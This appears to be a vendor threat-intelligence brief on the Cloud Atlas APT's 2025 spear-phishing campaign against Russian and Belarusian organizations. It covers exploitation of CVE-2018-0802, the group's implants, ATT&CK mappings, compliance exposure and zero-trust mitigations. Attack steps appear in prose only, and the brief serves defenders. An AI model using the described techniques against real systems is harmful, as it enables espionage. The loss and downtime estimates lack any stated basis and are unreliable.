Cloud Atlas 2025: APT Espionage Hits Russian and Belarusian Organizations via Cloud-Based Implants
Executive Summary
In the first half of 2025, the persistent threat group Cloud Atlas launched a series of sophisticated cyber-espionage campaigns targeting organizations in Russia and Belarus. Attackers employed spear-phishing emails with weaponized Microsoft Office documents exploiting CVE-2018-0802, initiating a complex multi-stage infection chain. Custom implants such as VBShower, VBCloud, CloudAtlas, and PowerShower enabled attackers to establish persistent access, exfiltrate sensitive data, steal credentials, and abuse cloud-based C2 channels. Multiple sectors were affected, including telecommunications, construction, government, and manufacturing, with operations characterized by stealthy lateral movement, DLL hijacking, and multi-layered payload delivery.
This incident is significant due to Cloud Atlas's use of novel, previously undocumented toolsets and cloud service abuse, reflecting a trend among APT actors toward cloud-based, modular attacks. It highlights the urgent need for heightened east-west security, advanced threat visibility, and multi-layered cloud controls, amid continued evolution of state-sponsored threat tactics.
Why This Matters Now
The Cloud Atlas 2025 campaign demonstrates the escalating capabilities of nation-state actors to exploit legacy vulnerabilities and harness cloud services for stealthy command and control. As APTs increasingly target sensitive sectors with advanced, modular backdoors and credential theft, organizations must urgently adapt their defenses to counter sophisticated, cloud-enabled espionage operations.
Attack Path Analysis
The attack began with phishing emails containing malicious Office documents exploiting CVE-2018-0802 to infect endpoints. Attackers gained code execution and persistence by dropping multiple implants using scheduled tasks and DLL hijacking. Backdoors enabled attackers to enumerate files, gather credentials, and potentially move laterally within internal networks and cloud services. Command and control took place via HTTP/WebDAV sessions with attacker-controlled infrastructure, using encrypted traffic to transmit beacons and receive new payloads. Data exfiltration occurred through plugins designed to steal documents, credentials, and other sensitive data, sending them to the C2 cloud storage. Though primary intent was espionage, attacker capabilities allowed for potential destructive impact by deploying malicious payloads, deleting data, or manipulating targeted systems.
Kill Chain Progression
Initial Compromise
Description
Phishing emails with malicious DOC(X)/RTF attachments exploiting Microsoft Office Equation Editor vulnerability (CVE-2018-0802) led to the download and execution of HTA files, which established first-stage malware.
Related CVEs
CVE-2018-0802
CVSS 7.8A memory corruption vulnerability in Microsoft Office's Equation Editor allows remote code execution when processing specially crafted files.
Affected Products:
Microsoft Office – 2007 SP3, 2010 SP2, 2013 SP1, 2016
Exploit Status:
exploited in the wildCVE-2017-11882
CVSS 7.8A memory corruption vulnerability in Microsoft Office's Equation Editor allows remote code execution when processing specially crafted files.
Affected Products:
Microsoft Office – 2007 SP3, 2010 SP2, 2013 SP1, 2016
Exploit Status:
exploited in the wild
MITRE ATT&CK® Techniques
MITRE ATT&CK mapping reflects key techniques observed in Cloud Atlas's 2025 campaign and may be enhanced with deeper STIX/TAXII alignment in future iterations.
Spearphishing Attachment
Exploitation for Client Execution
Command and Scripting Interpreter: Visual Basic
Scheduled Task/Job: Scheduled Task
Hijack Execution Flow: DLL Search Order Hijacking
Screen Capture
Exfiltration Over Web Service: Exfiltration to Cloud Storage
Credentials from Password Stores
Potential Compliance Exposure
Mapping incident impact across multiple compliance frameworks.
PCI DSS v4.0 – Log and Monitor All Access to Critical System Components
Control ID: 10.2.5
NYDFS 23 NYCRR 500 – Cybersecurity Policy
Control ID: Section 500.03
DORA (Regulation (EU) 2022/2554) – ICT Risk Management Framework
Control ID: Art. 9(2)
CISA Zero Trust Maturity Model (ZTMM) 2.0 – Continuous Monitoring and Automated Response
Control ID: Monitoring and Visibility
NIS2 Directive – Incident Handling Procedures
Control ID: Article 21(2)(e)
Sector Implications
Industry-specific impact of the vulnerabilities, including operational, regulatory, and cloud security risks.
Telecommunications
Cloud Atlas APT targets telecommunications infrastructure enabling lateral movement, encrypted traffic interception, and credential theft requiring zero trust segmentation and threat detection capabilities.
Government Administration
Eastern European government entities face sophisticated espionage campaigns exploiting Office vulnerabilities, requiring enhanced east-west traffic security and multicloud visibility for compliance frameworks.
Construction
Construction sector targeted by APT espionage using phishing attacks and file exfiltration, necessitating egress security policy enforcement and anomaly detection for operational technology protection.
Computer Software/Engineering
Software organizations vulnerable to Kubernetes security breaches and cloud firewall bypasses through PowerShell backdoors, requiring inline IPS and cloud native security fabric implementations.
Sources
- Cloud Atlas activity in the first half of 2025: what changedhttps://securelist.com/cloud-atlas-h1-2025-campaign/118517/Verified
- CVE-2018-0802 | INCIBE-CERT | INCIBEhttps://www.incibe.es/en/incibe-cert/early-warning/vulnerabilities/cve-2018-0802Verified
- CVE-2018-0802 : Equation Editor in Microsoft Office 2007, Microsoft Office 2010, Microsoft Offichttps://www.cvedetails.com/cve/CVE-2018-0802/Verified
- Inception, Inception Framework, Cloud Atlas, Group G0100 | MITRE ATT&CK®https://attack.mitre.org/groups/G0100/Verified
Frequently Asked Questions
Cloud Native Security Fabric Mitigations and ControlsCNSF
Zero Trust segmentation, east-west traffic controls, centralized visibility, inline threat detection, egress policy, and strong encrypted traffic inspection would have greatly constrained the attack at most points in the kill chain—limiting malware delivery, lateral movement, C2 communication, and exfiltration within both hybrid and multicloud environments.
Control: Threat Detection & Anomaly Response
Mitigation: Detection and alerting on suspicious initial-stage payloads and anomalous document behavior.
Control: Zero Trust Segmentation
Mitigation: Restricted execution scope for malicious scripts and isolation of sensitive workloads.
Control: East-West Traffic Security
Mitigation: Blocked unauthorized workload-to-workload and service-to-service lateral flows.
Control: Egress Security & Policy Enforcement
Mitigation: Detection and prevention of unauthorized outbound connections to malicious domains or cloud C2 endpoints.
Control: Encrypted Traffic (HPE) & Multicloud Visibility & Control
Mitigation: Monitor, alert, and control unauthorized encrypted data flows and anomalous transfers.
Early containment and autonomous response to detected destructive behaviors.
Impact at a Glance
Affected Business Functions
- Government Operations
- Telecommunications
- Construction
- Industrial Manufacturing
Estimated downtime: 5 days
Estimated loss: $500,000
Potential exposure of sensitive government and industrial data, including proprietary information and confidential communications.
Recommended Actions
Key Takeaways & Next Steps
- • Harden inbound email and application security controls to prevent exploit-based initial compromise.
- • Implement microsegmentation and zero trust network policies to restrict privilege escalations and lateral movement across all environments.
- • Enforce rigorous egress controls with domain/URL filtering and encrypted traffic inspection to block unauthorized outbound C2 and data exfiltration.
- • Deploy centralized, multicloud visibility and anomaly detection to catch and respond rapidly to malicious activity across east-west and hybrid-cloud flows.
- • Regularly validate, test, and update zero trust enforcement policies—including automation and inline response measures—to ensure resilience against evolving APT techniques.
